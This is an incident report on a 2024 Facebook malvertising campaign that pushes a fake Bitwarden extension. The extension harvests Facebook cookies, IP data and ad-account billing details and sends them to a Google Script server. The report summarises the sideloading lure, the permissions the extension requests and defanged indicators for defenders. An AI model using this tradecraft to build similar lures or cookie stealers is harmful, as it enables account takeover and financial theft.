Full Report
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
Analysis Summary
# Incident Report: Malvertising Campaign Distributing Fake Bitwarden Extension via Facebook
## Executive Summary
Throughout 2024, Bitdefender Labs observed a sophisticated malvertising campaign using Facebook to disseminate malware disguised as a legitimate Bitwarden security update. Attackers leveraged multi-step redirection, social engineering, and sideloading techniques to trick European users into installing a malicious browser extension that harvested Facebook authentication cookies, IP information, and sensitive business/billing details linked to Facebook ad accounts. The incident was discovered through proactive research by Bitdefender Labs.
## Incident Details
- **Discovery Date:** Ongoing research throughout 2024; specific campaign identified around November 3, 2024.
- **Incident Date:** Campaign launched on November 3, 2024.
- **Affected Organization:** Individual consumers and businesses using Facebook and Bitwarden, particularly users aged 18-65 in Europe.
- **Sector:** Technology/Social Media/E-commerce (Targeting users of these services).
- **Geography:** Europe (Initial focus), with a potential for global expansion.
## Timeline of Events
### Initial Access
- **Date/Time:** November 3, 2024 (Launch of the specific campaign).
- **Vector:** Malicious advertisements served through Meta's Facebook advertising platform.
- **Details:** Ads impersonated the Bitwarden password manager, using urgent language ("Warning: Your Passwords Are at Risk!") to prompt users to install a supposed "security update."
### Lateral Movement
*Not applicable in the traditional sense, as this was a client-side compromise executed via user deception rather than network lateral movement.*
### Data Exfiltration/Impact
- **Vector:** Malicious browser extension installed via sideloading.
- **Details:** The extension executed scripts (`background.js`) to harvest:
1. Facebook cookies (specifically the `c_user` ID).
2. IP and geolocation data (via `api.ipify.org` and `freeipapi.com`).
3. Data from Facebook’s Graph API, including personal details, business accounts, and credit card/billing details associated with ad accounts.
- **Exfiltration:** Data was encoded and sent to a Google Script URL acting as the C2 server.
### Detection & Response
- **Detection:** Proactive research and monitoring by Bitdefender Labs.
- **Response Actions:** Publication of research findings to alert the public and security community on the evolving tactics.
## Attack Methodology
- **Initial Access:** Malvertising via Facebook leading to a phishing page mimicking the Chrome Web Store, followed by providing a malicious ZIP file via Google Drive.
- **Persistence:** Achieved by tricking the user into manually sideloading the malicious extension into the browser using Developer Mode (`chrome://extensions`).
- **Privilege Escalation:** Not required, as the extension was installed directly by the unsuspecting user with high permissions.
- **Defense Evasion:** Bypassing standard security checks by guiding the user through the *manual loading of an unpacked extension* (sideloading).
- **Credential Access:** Direct harvesting of Facebook session cookies (`c_user`).
- **Discovery:** Access to extensions management (`management` permission) and network request monitoring (`webRequest`, `declarativeNetRequest`).
- **Lateral Movement:** N/A.
- **Collection:** Harvesting Facebook cookies, running IP/location lookups, and enumerating user/business data via Facebook Graph API.
- **Exfiltration:** Data encoded and transmitted to a C2 server hosted on a Google Script URL using the `sendData()` function.
- **Impact:** Unauthorized access and theft of personal data, session cookies, and sensitive business/financial information stored within the browser context of the targeted Facebook platform.
## Impact Assessment
- **Financial:** Potential financial losses due to the compromise of credit card and billing details associated with Facebook ad accounts.
- **Data Breach:** Harvesting of Facebook user IDs, names, business/ad account details, and payment information.
- **Operational:** Disruption to users related to potential account takeover or fraudulent activity initiated using the harvested credentials.
- **Reputational:** Damage to the reputation of legitimate services involved (Bitwarden, Facebook) due to impersonation and ad platform exploitation.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 Communication to `http[s]://script.google.com/` endpoints.
- External lookups to `api[.]ipify[.]org` and `freeipapi[.]com`.
- **File Indicators:**
- Malicious extension files: `service-worker-loader.js`, `background.js`, `popup.js`.
- Installation format: ZIP archive delivered via Google Drive link.
- **Behavioral Indicators:**
- User sideloading an unpacked extension via Developer Mode.
- Extension requesting permissions including `webRequest`, `declarativeNetRequest`, and `management`.
- Background script execution upon installation (`chrome.runtime.onInstalled`).
## Response Actions
- **Containment:** Public disclosure of the vulnerability and tactics, urging users to check installed extensions.
- **Eradication:** Users must manually remove the malicious extension and invalidate/reset credentials tied to compromised accounts.
- **Recovery Actions:** Security software (like Bitdefender) can be used to block malicious links and detect unauthorized extensions.
## Lessons Learned
- Threat actors are adept at leveraging high-trust platforms (Facebook Ads) to distribute malware through multi-layered redirection schemes.
- Sideloading provides a viable method for attackers to manipulate users into bypassing standard application store security checks.
- Impersonating trusted password managers (Bitwarden) and instilling urgency is an effective social engineering tactic.
## Recommendations
- Implement robust endpoint security solutions capable of detecting and blocking unauthorized browser extensions and suspicious sideloading activities.
- Users should utilize scam detection tools (e.g., Bitdefender Scamio) to verify links before clicking, especially on social media.
- Organizations should mandate Multi-Factor Authentication (MFA) universally, even for sites like Facebook, as session cookies alone can sometimes be sufficient for access if not paired with MFA checks.
- Security teams should monitor internal network traffic for connections to known C2 infrastructure or suspicious Google Script URLs originating from user endpoints.